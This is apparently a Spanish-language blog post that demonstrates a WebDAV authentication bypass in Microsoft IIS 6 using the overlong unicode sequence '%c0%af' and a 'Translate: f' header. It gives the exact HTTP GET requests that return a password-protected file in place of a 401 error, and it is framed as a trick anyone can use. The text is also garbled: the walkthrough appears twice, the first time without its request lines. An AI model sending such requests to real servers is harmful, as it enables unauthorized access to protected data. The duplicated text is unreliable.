Nada mas enterarme fui a probarlo: vulnerabilidad de las que hasta un niño pequeño sabe usar en el IIS 6 (solo si incluye el modulo WebDAV) de Microsoft (por si alguien no lo conoce, el "Apache" del tito Bill.
Afecta a los directorios protegidos, en vez de darnos un bello error 401 Unauthorized, nos escupiran el archivo "supuestamente" protegido.
Veamos como se hace esto, siguiendo el articulo que publicaba kcope hace apenas unos dias en este documento:
Todo esto se basa en como maneja el IIS el caracter unicode "%c0%af".
Al hacer una peticion normal, del tipo:
Recibiriamos un error 401 Unauthorized. Normal, es una peticion comun. Probemos otra cosa.
Hacemos una peticion con el caracter unicode del que hablabamos antes:
401 Unauthorized. Bien, parece que un servidor IIS 6 en condiciones normales maneja bien el caracter maldito.
Y que tal WebDAV? Probemos:
Zas! Ahi tenemos nuestro bonito archivo protected.zip, con todas las claves del gobierno (teoricamente ).
Nos lo devuelve limpiamente.
Afecta a los directorios protegidos, en vez de darnos un bello error 401 Unauthorized, nos escupiran el archivo "supuestamente" protegido.
Veamos como se hace esto, siguiendo el articulo que publicaba kcope hace apenas unos dias en este documento:
Todo esto se basa en como maneja el IIS el caracter unicode "%c0%af".
Al hacer una peticion normal, del tipo:
GET /protected/protected.zip HTTP/1.1
Connection: close
Host: servername
Recibiriamos un error 401 Unauthorized. Normal, es una peticion comun. Probemos otra cosa.
Hacemos una peticion con el caracter unicode del que hablabamos antes:
GET /prot%c0%afected/protected.zip HTTP/1.1
Connection: close
Host: servername
401 Unauthorized. Bien, parece que un servidor IIS 6 en condiciones normales maneja bien el caracter maldito.
Y que tal WebDAV? Probemos:GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f <--Con esto indicamos que la peticion sea manejada con WebDAV
Connection: close
Host: servername
Zas! Ahi tenemos nuestro bonito archivo protected.zip, con todas las claves del gobierno (teoricamente ).
Nos lo devuelve limpiamente.
0 comentarios:
Publicar un comentario